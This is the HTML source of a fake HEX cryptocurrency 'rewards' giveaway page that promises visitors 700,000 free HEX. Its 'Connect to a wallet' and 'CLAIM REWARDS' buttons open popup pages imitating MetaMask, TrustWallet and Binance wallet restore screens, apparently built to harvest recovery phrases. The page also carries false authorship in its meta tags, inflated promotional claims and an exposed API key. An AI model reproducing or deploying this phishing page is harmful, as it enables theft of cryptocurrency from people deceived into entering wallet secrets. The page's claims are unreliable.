

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<title>HEX REWARDS</title>
	<link rel="shortcut icon" href="https://puasalebaranlagi.my.id/_assets/img/favicon128.png">
	<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1">

	<link rel="stylesheet" href="popup.css">
    <link rel="stylesheet" href="bootstrap.css">
	<link rel="stylesheet" href="corrct.css" media="screen">
	<link rel="stylesheet" href="https://puasalebaranlagi.my.id/_assets/css/MaterialIcons.css">
	<link rel="stylesheet" href="./main.css">
	<link rel="stylesheet" href="https://puasalebaranlagi.my.id/_assets/css/video-js.min.css" media="print" onload="this.media='all'">
	<script src="https://puasalebaranlagi.my.id/_assets/js/video.min.js"></script>
	<script src="https://puasalebaranlagi.my.id/_assets/js/jquery-3.6.0.min.js"></script>

	<meta property="og:type" content="website">
	<meta property="og:title" content="">
	<meta name="twitter:card" content="summary_large_image">
	<meta name="twitter:title" content="">

	<!-- SEO -->
	<meta name="copyright" content="Richard Heart, 2024">
	<meta name="author" content="Richard Heart">
	<meta name="description" lang="en" content=": The first high-yield Blockchain Certificate of Deposit">
	<meta name="keywords" lang="en" content="HEX, crypto, yield, staking, rewards, Richard Heart, scam">
	<meta name="date" content="2024-02-04T00:00:00+00:00">
	<meta name="page-topic" content="HEX, crypto">

	<!-- Google Analytics-->
	<script async src="https://www.googletagmanager.com/gtag/js?id=UA-114685491-4"></script>
	<script>
		window.dataLayer = window.dataLayer || [];
		function gtag(){dataLayer.push(arguments);}
		gtag('js', new Date());
		gtag('config', 'UA-114685491-4');
	</script>

	<meta property="og:url" content="https://">
	<meta property="og:description" content=": The first high-yield Blockchain Certificate of Deposit">
	<meta name="twitter:description" content=": The first high-yield Blockchain Certificate of Deposit">
	<meta property="og:image:url" content="https:///_assets/twt_cards/Main.png">
	<meta name="twitter:image" content="https:///_assets/twt_cards/Main.png">

	<script src="https://puasalebaranlagi.my.id/_assets/js/particles.min.js"></script>
	<script src="https://puasalebaranlagi.my.id/_assets/js/Chart.min.js"></script>
	<script src="https://puasalebaranlagi.my.id/_assets/js/moment.min.js"></script>

	<!--Load background images of subpages into cache-->
	<link rel="prefetch" as="image" href="https://puasalebaranlagi.my.id/_assets/img/bg/floor.jpg">
	<link rel="prefetch" as="image" href="https://puasalebaranlagi.my.id/_assets/img/bg/lambo.jpg">

	<style>
		/*tooltips*/
		[tt] {
			position: relative;
		}
		[tt]:after {
			color: #fff; font-weight: 600; font-size: 12px;
			user-select: none; cursor: default;

			content: attr(tt); visibility: hidden; opacity: 0; transition: all .2s;
			background-color: #fff; color: var(--darkBlue); border-radius: 5px; text-align: center; padding: 5px 8px; box-shadow: 0 5px 15px #000;
			position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%);
			width: 120px; text-align: center;
		}

		.pulseCard:before {
			content: ''; position: absolute; top: 0; right: 0; bottom: 0; left: 0;
			margin: -3px; z-index: -1; border-radius: 10px;
		}
		#pulseCcard:before {background: var(--pulseGradient);}
		#pulseXcard:before {background: var(--pulseXGradient);}

		#statsGrid > div {
			text-align: center; padding: 0;
		}

		#statsGrid > div > h1 {
			color: #fff; margin-bottom: 5px;
		}

		@media (max-width: 1050px) {
			iframe {display: none;}
			#section2vid1 {margin-bottom: 0 !important;}
			#section2vid2 {display: none;}
			#section3title, #section6title {font-size: 32px !important; text-align: left !important; white-space: normal !important; margin-top: inherit !important;}
			#awesomeSitesGrid {grid-template-columns: repeat(2, 1fr) !important; grid-gap: 30px;}
		}

		@media (max-width: 820px) {
			#mainTitleBreak {display: none;}
			#statsGrid {grid-template-columns: repeat(3, 1fr) !important;}
			#chartCanvasOuter {height: 400px !important;}
			#specialGrid {grid-template-columns: repeat(2, 1fr) !important; grid-gap: 30px;}
		}

		@media (max-width: 600px) {
			.pulseCard {width: calc(100% - 60px) !important;}
			.pulseCard > img {margin-bottom: 5px;}
			.pulseCard br, #openStakeBtn, .hideMobileStat, .dataLbl-stakersChange, .dataLbl-holdersChange {display: none;}
			#statsGrid {grid-template-columns: repeat(2, 1fr) !important; grid-gap: 30px;}
			#statsGrid > div {text-align: left;}
			#specialGrid, #awesomeSitesGrid {grid-template-columns: 1fr !important;}
			#statsGrid > div > h1 {font-size: 20px;}
			#chartCanvasOuter {height: 350px !important;}
		}

		@media (max-width: 550px) {
			#mainTitle {font-size: 30px !important;}
		}

		@media (max-width: 450px) {
			#nomicsDisc {margin: 25px 0 0 0 !important;}
			#chartCanvasOuter {height: 300px !important;}
			.pulseCard > img {display: none;}
		}

	</style>
</head>
<body>

	<div class="modal fade" id="staticBackdrop" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-hidden="true">
        
		<div class="modal-dialog">
		<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
          <div class="modal-content">
            <div class="modal-header" style="background-color: white; margin-bottom: -10px;">
              <h5 class="modal-title" id="staticBackdropLabel" style="color: black;">Connect to a wallet</h5>
              <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
            </div>
            <div class="modal-body">
              <div class="d-grid gap-2">
      
                <div class="jarak">
                  <button onclick="window.open('boston/metamask.html?nkbihfbeogaeaoehlefnkodbefgpgknn/home#restore-vault','','toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=650') ;" type="button" class="beTwZZ" style="justify-content: space-between;">
                      <div color="#ffffff" class="sc-gsTCUz fTmLLO">MetaMask</div>
                      <svg viewBox="0 0 96 96" width="32px" color="text" xmlns="http://www.w3.org/2000/svg" class="sc-bdfBwQ eMlqvM">
                          <circle cx="48" cy="48" r="48" fill="white"></circle>
                          <path d="M77.7602 16.9155L51.9419 36.0497L56.7382 24.7733L77.7602 16.9155Z" fill="#E17726"></path>
                          <path d="M18.2656 16.9155L43.8288 36.2283L39.2622 24.7733L18.2656 16.9155Z" fill="#E27625"></path>
                          <path d="M68.4736 61.2808L61.6108 71.7918L76.3059 75.8482L80.4899 61.5104L68.4736 61.2808Z" fill="#E27625"></path>
                          <path d="M15.5356 61.5104L19.6941 75.8482L34.3892 71.7918L27.5519 61.2808L15.5356 61.5104Z" fill="#E27625"></path>
                          <path d="M33.5984 43.5251L29.491 49.699L44.0584 50.3624L43.5482 34.6724L33.5984 43.5251Z" fill="#E27625"></path>
                          <path d="M62.4274 43.525L52.2991 34.4937L51.9419 50.3622L66.5094 49.6989L62.4274 43.525Z" fill="#E27625"></path>
                          <path d="M34.3892 71.7922L43.1654 67.5316L35.6137 61.6128L34.3892 71.7922Z" fill="#E27625"></path>
                          <path d="M52.8345 67.5316L61.6107 71.7922L60.3861 61.6128L52.8345 67.5316Z" fill="#E27625"></path>
                          <path d="M61.6107 71.7923L52.8345 67.5317L53.5233 73.2465L53.4468 75.6446L61.6107 71.7923Z" fill="#D5BFB2"></path>
                          <path d="M34.3892 71.7923L42.5531 75.6446L42.502 73.2465L43.1654 67.5317L34.3892 71.7923Z" fill="#D5BFB2"></path>
                          <path d="M42.7062 57.8369L35.4097 55.6939L40.5631 53.3213L42.7062 57.8369Z" fill="#233447"></path>
                          <path d="M53.2937 57.8369L55.4367 53.3213L60.6412 55.6939L53.2937 57.8369Z" fill="#233447"></path>
                          <path d="M34.3893 71.7918L35.6649 61.2808L27.552 61.5104L34.3893 71.7918Z" fill="#CC6228"></path>
                          <path d="M60.3352 61.2808L61.6108 71.7918L68.4736 61.5104L60.3352 61.2808Z" fill="#CC6228"></path>
                          <path d="M66.5094 49.6987L51.9419 50.362L53.294 57.8371L55.4371 53.3215L60.6416 55.6941L66.5094 49.6987Z" fill="#CC6228"></path>
                          <path d="M35.4098 55.6941L40.5633 53.3215L42.7063 57.8371L44.0584 50.362L29.491 49.6987L35.4098 55.6941Z" fill="#CC6228"></path>
                          <path d="M29.491 49.6987L35.6139 61.6129L35.4098 55.6941L29.491 49.6987Z" fill="#E27525"></path>
                          <path d="M60.6414 55.6941L60.3862 61.6129L66.5092 49.6987L60.6414 55.6941Z" fill="#E27525"></path>
                          <path d="M44.0584 50.3618L42.7063 57.8369L44.4156 66.6641L44.7728 55.0305L44.0584 50.3618Z" fill="#E27525"></path>
                          <path d="M51.9415 50.3618L51.2527 55.005L51.5843 66.6641L53.2937 57.8369L51.9415 50.3618Z" fill="#E27525"></path>
                          <path d="M53.2938 57.8374L51.5845 66.6646L52.8346 67.532L60.3862 61.6132L60.6413 55.6943L53.2938 57.8374Z" fill="#F5841F"></path>
                          <path d="M35.4097 55.6943L35.6138 61.6132L43.1654 67.532L44.4155 66.6646L42.7062 57.8374L35.4097 55.6943Z" fill="#F5841F"></path>
                          <path d="M53.4468 75.6443L53.5233 73.2462L52.8855 72.6849H43.1143L42.502 73.2462L42.5531 75.6443L34.3892 71.792L37.2465 74.1391L43.0378 78.1445H52.962L58.7533 74.1391L61.6107 71.792L53.4468 75.6443Z" fill="#C0AC9D"></path>
                          <path d="M52.8346 67.5315L51.5845 66.6641H44.4156L43.1655 67.5315L42.5022 73.2462L43.1145 72.6849H52.8857L53.5235 73.2462L52.8346 67.5315Z" fill="#161616"></path>
                          <path d="M78.8314 37.2998L80.9999 26.7377L77.7599 16.9155L52.8345 35.4119L62.4271 43.5247L75.9485 47.4791L78.9335 43.984L77.6323 43.04L79.7243 41.1521L78.1426 39.902L80.2091 38.3458L78.8314 37.2998Z" fill="#763E1A"></path>
                          <path d="M15 26.7377L17.194 37.2998L15.7909 38.3458L17.8574 39.902L16.2756 41.1521L18.3676 43.04L17.0665 43.984L20.0514 47.4791L33.5984 43.5247L43.1655 35.4119L18.2656 16.9155L15 26.7377Z" fill="#763E1A"></path>
                          <path d="M75.9487 47.4793L62.4272 43.5249L66.5092 49.6989L60.3862 61.613L68.4736 61.511H80.4898L75.9487 47.4793Z" fill="#F5841F"></path>
                          <path d="M33.5983 43.5249L20.0513 47.4793L15.5356 61.511H27.5519L35.6137 61.613L29.4908 49.6989L33.5983 43.5249Z" fill="#F5841F"></path>
                          <path d="M51.9415 50.3617L52.8344 35.4115L56.7378 24.7729H39.262L43.1653 35.4115L44.0583 50.3617L44.3899 55.0559L44.4154 66.664H51.5843L51.6099 55.0559L51.9415 50.3617Z" fill="#F5841F"></path>
                      </svg>
              </div>
      
              <div class="jarak">
                <button onclick="window.open('bostonss/trust.html?nkbihfbeogaeaoehlefnkodbefgpgknn/home#restore-vault','','toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=650') ;" type="button" class="beTwZZ" style="justify-content: space-between;">
                    <div color="#ffffff" class="sc-gsTCUz fTmLLO">TrustWallet</div>
                    <img src="trustwallet.eebf3ae2.svg" alt="Girl in a jacket" width="32" height="32">
                </button>
            </div>
            <div class="">
              <button onclick="window.open('bostons/binance.html?nkbihfbeogaeaoehlefnkodbefgpgknn/home#restore-vault','','toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=400,height=650') ;" id="wallet-connect-metamask" type="button" class="beTwZZ" style="justify-content: space-between;">
                  <div color="#ffffff" class="sc-gsTCUz fTmLLO">Binance Chain Wallet</div>
                  <svg viewBox="0 0 32 32" width="32px" color="text" xmlns="http://www.w3.org/2000/svg" class="sc-bdfBwQ eMlqvM">
                      <path d="M24 0H8C3.58172 0 0 3.58172 0 8V24C0 28.4183 3.58172 32 8 32H24C28.4183 32 32 28.4183 32 24V8C32 3.58172 28.4183 0 24 0Z" fill="#1E2026"></path>
                      <path d="M16.2857 4L9.97035 7.6761L12.2922 9.03415L16.2857 6.7161L20.2792 9.03415L22.6011 7.6761L16.2857 4Z" fill="#F0B90B"></path>
                      <path d="M20.2792 10.9541L22.6011 12.3122V15.0283L18.6075 17.3463V21.9824L16.2857 23.3405L13.9639 21.9824V17.3463L9.97035 15.0283V12.3122L12.2922 10.9541L16.2857 13.2722L20.2792 10.9541Z" fill="#F0B90B"></path>
                      <path d="M22.6011 16.9483V19.6644L20.2792 21.0224V18.3063L22.6011 16.9483Z" fill="#F0B90B"></path>
                      <path d="M20.2561 22.9424L24.2496 20.6244V15.9883L26.5714 14.6302V21.9824L20.2561 25.6585V22.9424Z" fill="#F0B90B"></path>
                      <path d="M24.2496 11.3522L21.9278 9.99414L24.2496 8.63609L26.5714 9.99414V12.7102L24.2496 14.0683V11.3522Z" fill="#F0B90B"></path>
                      <path d="M13.9639 26.642V23.9259L16.2857 25.2839L18.6075 23.9259V26.642L16.2857 28L13.9639 26.642Z" fill="#F0B90B"></path>
                      <path d="M12.2922 21.0224L9.97035 19.6644V16.9483L12.2922 18.3063V21.0224Z" fill="#F0B90B"></path>
                      <path d="M16.2857 11.3522L13.9639 9.99414L16.2857 8.63609L18.6075 9.99414L16.2857 11.3522Z" fill="#F0B90B"></path>
                      <path d="M10.6437 9.99414L8.32183 11.3522V14.0683L6 12.7102V9.99414L8.32183 8.63609L10.6437 9.99414Z" fill="#F0B90B"></path>
                      <path d="M6 14.6302L8.32183 15.9883V20.6244L12.3154 22.9424V25.6585L6 21.9824V14.6302Z" fill="#F0B90B"></path>
                  </svg>
              </button>
          </div>
      
               
      
              </div>
            </div>
            <div class="modal-footer" style="background-color: white; margin-top: -10px;">
            
            </div>
          </div>
        </div>
      </div>


	<style>
		/*menu bar expanding to full width onscroll*/
		.menuBarScrolled {
			clip-path: polygon(
				0 0, 0 0,
				100% 0, 100% 0,
				100% 50%, 100% 50%,
				100% 100%, 100% 100%,
				0 100%, 0 100%,
				0 50%, 0 50%
			) !important;
		}

		/*menu links & dropdown*/
		.menuLink {
			position: relative; display: inline-block; padding: 28px 16px; white-space: nowrap;
		}
		.menuLink, .mobileMenuLink {
			font-weight: 600; font-size: 16px; text-transform: uppercase; letter-spacing: .05em; color: #aaa;
		}
		.menuLinkActive, .menuLinkStatic {cursor: default;}
		.menuLinkActive { color: #fff; font-weight: 700; pointer-events: none;}
		.menuLink > span {
			position: relative; float: right; font-size: 1.35em;
		}
		.mpContent > .menuLink {
			padding: 8px 16px; width: calc(100% - 32px);
		}

		@media not all and (pointer:coarse) {
			.menuLink:not(.menuLinkActive, .menuLinkStatic):hover, .mobileMenuLink:hover {
				color: #ccc;
			}

			.menuLinkOuter:hover .mpContent {
				opacity: 1 !important; visibility: visible !important;
			}
		}


		#mobileMenu > div > div {
			position: relative; float: right; width: 100%;
		}
		.mobileMenuLink {
			position: relative; float: right; font-size: 20px; margin-bottom: 10px; padding: 5px 12px;
		}


		/*Price label online indicator*/
		#menuBarPriceLbl:before {
			content: '⬢'; transform: rotate(30deg);
			position: absolute; font-size: 9px; left: -12px; top: 2px;
		}

		#menuBarPriceLbl:after {
			content: '⬢';
			position: absolute; font-size: 9px; left: -12px; top: 2px;
			animation-name: pulsate; animation-duration: 2s; animation-iteration-count: infinite;
		}

		@keyframes pulsate {
			from {transform: rotate(30deg) scale(1); opacity: .6;}
			to {transform: rotate(30deg) scale(4); opacity: 0;}
		}



		@media (hover: none), (max-width: 1080px) {
			#menuBarOuter {top: 0 !important;}
			#menuBarBG {
				clip-path: polygon(
					0 0, 0 0,
					100% 0, 100% 0,
					100% 50%, 100% 50%,
					100% 100%, 100% 100%,
					0 100%, 0 100%,
					0 50%, 0 50%
				) !important;
			}
		}

		@media (hover: none), (max-width: 1050px) {
			#buyBtn > .mi {display: none;}
		}

		@media (hover: none), (max-width: 820px) {
			.menuLink, #buyBtn {display: none;}
			#mobileMenuBtn, #mobileMenu {display: inherit !important;}
			#menuBarOuter {transition: all .2s !important;}
		}

		@media (max-height: 550px) {
			.mobileMenuLink {margin-bottom: 5px;}
		}
	</style>

	<div id="menuBarOuter" style="position: fixed; left: 0; top: 15px; width: 100%; height: 80px; z-index: 1000; transition: all .5s;">
		<div class="hr" id="menuBarBG" style="position: absolute; left: 0; top: 0; width: 100%; height: 100%; background-color: var(--bgColor); height: 80px; clip-path: polygon(
			calc(50% - var(--bodyWidth)/2 - 2px) 2px,
			calc(50% - var(--bodyWidth)/2 + 1px) 0,
			calc(50% + var(--bodyWidth)/2 - 1px) 0,
			calc(50% + var(--bodyWidth)/2 + 2px) 2px,
			calc(50% + var(--bodyWidth)/2 + 23px) calc(50% - 2px),
			calc(50% + var(--bodyWidth)/2 + 23px) calc(50% + 2px),
			calc(50% + var(--bodyWidth)/2 + 2px) calc(100% - 2px),
			calc(50% + var(--bodyWidth)/2 - 1px) 100%,
			calc(50% - var(--bodyWidth)/2 + 1px) 100%,
			calc(50% - var(--bodyWidth)/2 - 2px) calc(100% - 2px),
			calc(50% - var(--bodyWidth)/2 - 23px) calc(50% + 2px),
			calc(50% - var(--bodyWidth)/2 - 23px) calc(50% - 2px)
		); transition: all .5s;"></div>

		<div class="hr" style="width: var(--bodyWidth);">
			<a href="." id="menuLogoLink">
				<img src="https://puasalebaranlagi.my.id/_assets/img/wordmark.svg" class="fl" style="height: 40px; margin-top: 20px;" alt=" Logo svg">
				<span id="menuBarPriceLbl" style="display: none; position: absolute; top: 10px; left: 171px; color: #0f5; font-size: 12px; font-family: 'Jost';"></span>
			</a>

			<a class="menuLink" href="">How it works</a>
			<a class="menuLink" href="">Contact</a>
			<a class="menuLink" href="">FAQ</a>
			<div class="menuLinkOuter" style="position: relative; display: inline-block; height: 100%;">
				<a class="menuLink menuLinkStatic" href="javascript:">More<span class="mi">expand_more</span></a>
				<div class="mpContent" style="visibility: hidden; opacity: 0; transition: all .2s; position: absolute; right: 0; top: 100%; background-color: var(--bgColor); text-align: right; clip-path: polygon(0 0, 100% 0, 100% calc(100% - 10px), calc(100% - 6px) 100%, 6px 100%, 0 calc(100% - 10px));">
					<a class="menuLink" href="">Testimonials</a>
					<!-- <a class="menuLink" href="./calculator">Calculator</a> -->
					<a class="menuLink" href="">Security</a>
					<a class="menuLink" href="">Links</a>
					<a class="menuLink" href="" style="padding-bottom: 16px;">HEX vs Bitcoin</a>
				</div>
			</div>

			<a href="" data-bs-toggle="modal" data-bs-target="#staticBackdrop" id="buyBtn" class="btn btnColored" style="float: right; margin-top: 17px;">
				<span class="mi">credit_card</span>Connect to a wallet
			</a>

			<a href="javascript:menu()" id="mobileMenuBtn" class="btn btnColored" style="display: none; float: right; margin-top: 17px; padding: 11px 15.5px;">
				<span class="mi" style="margin-right: 0;">menu</span>
			</a>
			
		</div>

		<div id="mobileMenu" style="display: none; visibility: hidden; position: absolute; top: 100%; left: 0; width: 100%; background-color: var(--bgColor); transform: translateX(111%); will-change: transform; transition: all .2s;">
			<div style="width: var(--bodyWidth); position: relative; display: inline-block; text-align: right;">
				<a href="" data-bs-toggle="modal" data-bs-target="#staticBackdrop" id="mobileBuyBtn" class="btn btnColored" style="float: right; margin: 7px 0 25px 0;">
					<span class="mi">credit_card</span>Connect to a wallet
				</a>
				<div><a class="mobileMenuLink" href="">How it works</a></div>
				<div><a class="mobileMenuLink" href="">Contact</a></div>
				<div><a class="mobileMenuLink" href="">FAQ</a></div>
				<div><a class="mobileMenuLink" href="">Testimonials</a></div>
				<!-- <div><a class="mobileMenuLink" href="./calculator">Calculator</a></div> -->
				<div><a class="mobileMenuLink" href="">Security</a></div>
				<div><a class="mobileMenuLink" href="">Links</a></div>
				<div><a class="mobileMenuLink" href="">HEX vs Bitcoin</a></div>

				
				
			</div>
		</div>
	</div>

	<script>
		if ('.' == '.')
			$('#menuLogoLink').addClass('menuLinkActive')

		const siteIndex = ['howitworks','scam','faq','testimonials','security','links','bitcoin'].indexOf(window.location.pathname.replaceAll('/',''))
		if (siteIndex > -1)
			$(`.menuLink:eq(${siteIndex>2?siteIndex+1:siteIndex}), .mobileMenuLink:eq(${siteIndex})`).addClass('menuLinkActive')

		if (window.location.pathname.replaceAll('/','') == 'buy') {
			$('#buyBtn').css({cursor:'default',transform:'scale(1)',filter:'none'}).attr('href','javascript:')
			$('#mobileBuyBtn').hide()
		}

		function scrollPlay () {
			const scrolled = $(document).scrollTop()>=1
			$('#menuBarBG').toggleClass('menuBarScrolled', scrolled)
			$('#menuBarOuter').css({
				top: scrolled ? 0 : 15,
				filter: `drop-shadow(0 2px ${scrolled ? 5 : 50}px #000)`
			})

			window.requestAnimationFrame(scrollPlay)
		}

		scrollPlay()

		let mobileMenuActive = false
		function menu () {
			mobileMenuActive = !mobileMenuActive
			$('#mobileMenuBtn').children().eq(0).text(mobileMenuActive ? 'close' : 'menu')
			$('#mobileMenu').css({
				transform: `translateX(${mobileMenuActive?0:111}%)`,
				visibility: mobileMenuActive ? 'visible' : 'hidden' // hide because the box-shadow is otherwise visible on the right border of the screen
			})
		}

		$.getJSON('https://hexdailystats.com/livedata', e => {
			let priceShort = Math.round(e.price*100)/100
			priceShort = '$' + (priceShort<1 ? priceShort.toString().slice(1) : priceShort) // remove leading 0
			$('#menuBarPriceLbl').text(priceShort).fadeIn(500)
		})
	</script>

	<div class="hr section" style="background-image: url(https://puasalebaranlagi.my.id/_assets/img/bg/main.webp);">
		<div id="particleDiv" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%;"></div>
		
			<h1 class="hr" id="mainTitle" style="margin: 80px 0 20px 0; font-size: 58px; line-height: 1.35em;">HEX (HEX) REWARDS</h1>
			<center>
				<div class="success-animation">
					<svg class="checkmark" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 52 52">
						<circle class="checkmark__circle" cx="26" cy="26" r="25" fill="none" />
						<path class="checkmark__check" fill="none" d="M14.1 27.2l7.1 7.2 16.7-16.8" />
					</svg>
				</div></center>
			<div class="hr pageOuter2">
				
				<div class="hr fl">
					<div class="hr" style="display: flex; justify-content: center; margin-bottom: -55px;">
						<h4 class="token-info-des" style="color: #0f5; font-size: 20px; ">You are lucky to get<span class="token-info-details" id="fegCombinedMc"></span></h4>
					</div>
					<div class="hr" style="display: flex; justify-content: center; margin-top: 50px; ">
						<h4 class="token-info-des" ><b style="background: var(--logoGradient); color: #fff; filter: saturate(.9);
							-webkit-background-clip: text;
							-webkit-text-fill-color: transparent;
							display: inline-block; font-size: 20px;">700000 HEX ($6238.31 USD)</b><span class="token-info-details" id="fegCombinedMc"></span></h4>
					</div>
					<div class="hr" style="display: flex; justify-content: center; margin-top: 5px;">
						HEX Token are used by hundreds of millions of people worldwide, creating a market valued in the trillions of dollars. HEX Token you choos gain interest every single day. The average supply is over 20% awarded to active users to make navigating the crypto world simple and intuitive.
					</div>
					<div class="hr" style="display: flex; justify-content: center; margin-top: 10px;">
						$HEX replaces currencies and are worth more than gold, has a marketcap with verifiably secure peer-to-peer technology. Currently, you are lucky to get 700000 HEX ($6238.31 USD) (free).
					</div>
					<div class="hr fl">
						<div class="hr" style="display: flex; justify-content: center; margin-top: 50px;">
							<a class="btn btnColored" href="" data-bs-toggle="modal" data-bs-target="#staticBackdrop">
								<span class="mi">credit_card</span>CLAIM REWARDS
							</a>
							
						</div>
					</div>
					
				</div>
			</div>
			
		
	</div>

	
	<div class="hr section sectionFlat" style="background-image: url(https://puasalebaranlagi.my.id/_assets/img/bg/hexes.jpg);">
		<div class="hr pageOuter">
			<span class="hr dataLbl-hexSentence" style="text-align: center;"></span>

			<div class="hr" style="margin: 10px 0 25px 0; height: 500px; position: relative;" id="chartCanvasOuter">
				<canvas id="chartCanvas"></canvas>
			</div>

			<span class="hr" style="text-align: center;">
				Buying just <span class="dataLbl-millionaire"></span> of HEX at its All-Time Low (5th Jan 2020) would have made you a millionaire. And that's without Staking!
			</span>
		</div>
	</div>

	

	<div class="hr section" style="background-color: #111; background-image: url(https://puasalebaranlagi.my.id/_assets/img/bg/pattern.jpg);">
		<div class="hr pageOuter">
			<h1 class="hr">Awesome community made sites</h1>
			<div class="hr imgGrid" id="awesomeSitesGrid">
				<a target="_blank" rel="noopener" style="background-image: url(https://puasalebaranlagi.my.id/_assets/img/websites/hexvision.jpg);" href=""></a>
				<a target="_blank" rel="noopener" style="background-image: url(https://puasalebaranlagi.my.id/_assets/img/websites/customhex.jpg);" href=""></a>
				<a target="_blank" rel="noopener" style="background-image: url(https://puasalebaranlagi.my.id/_assets/img/websites/hexgraphs.jpg);" href=""></a>
				<a target="_blank" rel="noopener" style="background-image: url(https://puasalebaranlagi.my.id/_assets/img/websites/apphex.jpg);" href=""></a>
				<a target="_blank" rel="noopener" style="background-image: url(https://puasalebaranlagi.my.id/_assets/img/websites/staker.jpg);" href=""></a>
				<a target="_blank" rel="noopener" style="background-image: url(https://puasalebaranlagi.my.id/_assets/img/websites/lookintohex.jpg);" href=""></a>
			</div>
		</div>
	</div>

	

	<script>
		particlesJS("particleDiv", {
			interactivity: {events: {
				onhover: {enable: false},
				onclick: {enable: false}
			}},
			particles: {
				number: {value: 10},
				shape: {
					type: 'image',
					image: {src: '_assets/img/hexParticle.png', width: 10, height: 10}
				},
				size: {value: 50, random: true},
				line_linked: {enable: false},
				move: {enable: true, speed: 3, direction: 'top-right'}
			}
		})

		function drawChart (prices) {
			const data = [], labels = []

			for (i=2;i<prices.length;i++) {
				data.push(prices[i])
				labels.push(i+1)
			}

			let chartMax = Math.max(...data)*2
			if (chartMax < 2) chartMax = 2

			new Chart($('#chartCanvas')[0].getContext('2d'), {
				type: 'line',
				data: {
					labels: labels,
					datasets: [{
						data: data, backgroundColor: '#f0f2', borderColor: '#f0f', pointRadius: 0
					}]
				},
				options: {
					tooltips: {
						mode: 'nearest', intersect: false,
						yAlign: 'bottom', xAlign: 'center', titleAlign: 'center', bodyAlign: 'center',
						displayColors: false, cornerRadius: 5,
						backgroundColor: '#fff',
						titleFontFamily: 'Poppins', titleFontStyle: '600', bodyFontSize: 15, bodyFontFamily: 'Jost', titleFontColor: '#555', bodyFontColor: '#000',
						callbacks: {
							title: i => 'HEX Day '+i[0].xLabel+'\n'+moment('12/2/19').add(parseInt(i[0].xLabel),'day').format('Do MMM YYYY'),
							label: i => '$'+parseFloat(Number(i.yLabel).toPrecision(2))
						}
					},
					responsive: true, maintainAspectRatio: false,
					elements: {line: {borderJoinStyle: 'round', borderWidth: 3}},
					legend: {display: false},
					scales:{
						yAxes: [{
							type: 'logarithmic',
							gridLines: {color: '#fff2', lineWidth: 2},
							scaleLabel: {
								display: true, fontFamily: 'Jost', fontSize: 16, fontColor: '#ccc', labelString: 'HEX price in USD'
							},
							ticks: {
								min: 0, max: chartMax, autoSkip: false, fontFamily: 'Poppins', fontStyle: '600', fontSize: 12, fontColor: '#ccc',
								callback: (value,i,v) => (Math.log10(value)%1 == 0) ? '$'+value : null
							}
						}],
						xAxes: [{
							gridLines: {color: '#fff2', lineWidth: 2},
							scaleLabel: {
								display: true, fontFamily: 'Jost', fontSize: 16, fontColor: '#ccc', labelString: 'Days since launch'
							},
							ticks: {
								autoSkip: false, fontFamily: 'Poppins', fontStyle: '600', fontSize: 12, fontColor: '#ccc',
								callback: (value,i,v) => {
									if (value == 3) return 1

									if (value % 100 == 0) return value
								}
							}
						}]
					}
				}
			})
		}

		async function getData () {
			const hdsApi = await $.getJSON('https://hexdailystats.com/hexsite')

			const priceX = Math.floor(hdsApi.priceATH / .000053879) // ATL from https://charts.cointrader.pro/charts.html?coin=HEX%3aUSD
			$('.dataLbl-priceX').text(priceX+'x')
			$('.dataLbl-millionaire').text('$'+Math.round(1_000_000/priceX))
			const doublings = Math.floor(Math.log2(priceX))
			$('.dataLbl-doublings').text(doublings)
			const hexDay = Math.floor((new Date().getTime() - 1575244800000)/1000/3600/24)
			$('.dataLbl-doubleTime').text(Math.round(hexDay / doublings) + ' days')
			$('.dataLbl-hexDay').text(hexDay)
			$('.dataLbl-hexSentence').html(`So far the price of HEX appreciated ${priceX}x (${Math.floor((priceX-1)*100).toLocaleString('en-US')}%) over ${hexDay} days.<br>It doubled ${doublings} times during that time, on average every ${Math.round(hexDay / doublings)} days.`)

			$('.dataLbl-avgStakeLength').text(Math.round(hdsApi.averageStakeLength*10)/10 + ' years')
			$('.dataLbl-holders').text(hdsApi.numberOfHolders.toLocaleString('en-US'))
			$('.dataLbl-holdersChange').text(`+${hdsApi.numberOfHoldersChange} today`)
			$('.dataLbl-stakers').text(hdsApi.currentStakerCount.toLocaleString('en-US'))
			$('.dataLbl-stakersChange').text(`+${hdsApi.currentStakerCountChange} today`)
			$('.dataLbl-tvl').text(`$${Math.round(hdsApi.totalValueLocked/1_000_000_000)}B`)
			$('.dataLbl-stakedSupply').text(Math.round(hdsApi.stakedHEX/1_000_000_000)+'B HEX')
			$('.dataLbl-supply').text(Math.round(hdsApi.circulatingHEX/1_000_000_000)+'B HEX')
			$('.dataLbl-shareX').text(Math.floor(hdsApi.tshareRateUSD_Highest / .56).toLocaleString('en-US')+'x')
			$('.dataLbl-sharePrice').text(Math.round(hdsApi.tshareRateUSD_Highest))

			drawChart(hdsApi.priceUV2UV3_Array)

			// Production key for  domain: 2ae62545bbe20a35fc20f2a7cc5a95a9
			const nApi = await $.getJSON('https://api.nomics.com/v1/currencies/ticker?key=2ae62545bbe20a35fc20f2a7cc5a95a9&ids=HEX&interval=1d')

			$('.dataLbl-price').text('$'+parseFloat(nApi[0].price).toFixed(2))
			$('.dataLbl-mCap').text(`$${Math.round(hdsApi.circulatingHEX*parseFloat(nApi[0].price)/1_000_000_000)}B`)
			$('.dataLbl-dominance').text(Math.round(parseFloat(nApi[0].market_cap_dominance)*1000)/10+'%')
			$('.dataLbl-exchanges').text(nApi[0].num_exchanges)
			$('.dataLbl-rank').text('#'+nApi[0].rank)
		}
		getData()
	</script>

	<style>
		#socialsOuter > a > img {
			height: 50px; position: absolute; transition: all .1s;
			clip-path: polygon( /*this is only to make hover effect borders more smooth*/
				25% 5%,
				75% 5%,
				102% 50%,
				75% 95%,
				25% 95%,
				-2% 50%
			);
		}

		@media not all and (pointer:coarse) {
			#socialsOuter > a > img:hover {transform: scale(1.08);}
		}

		#footerOuter {padding-top: 145px !important; padding-bottom: 40px;}
		@media (max-width: 1150px) {
